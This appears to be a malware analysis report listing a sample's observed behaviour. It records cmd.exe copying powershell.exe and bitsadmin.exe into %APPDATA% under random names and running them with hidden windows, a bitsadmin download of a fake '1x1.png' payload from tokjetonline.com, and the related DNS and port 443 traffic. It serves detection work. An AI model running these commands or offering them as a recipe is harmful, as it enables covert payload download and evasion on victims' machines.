Technical Information
- '%APPDATA%\gssqoawf.exe' /transfer LziFud /download https://tokjetonline.com/tonil/00625550264/1x1.png %APPDATA%\1x1.png
- %APPDATA%\zgssqoawf.exe
- %APPDATA%\gssqoawf.exe
- 'to####online.com':443
- DNS ASK to####online.com
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %APPDATA%\zGsSQOawf.exe' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\GsSQOawf.exe' (with hidden window)
- '%APPDATA%\gssqoawf.exe' /transfer LziFud /download https://tokjetonline.com/tonil/00625550264/1x1.png %APPDATA%\1x1.png' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %APPDATA%\zGsSQOawf.exe
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\GsSQOawf.exe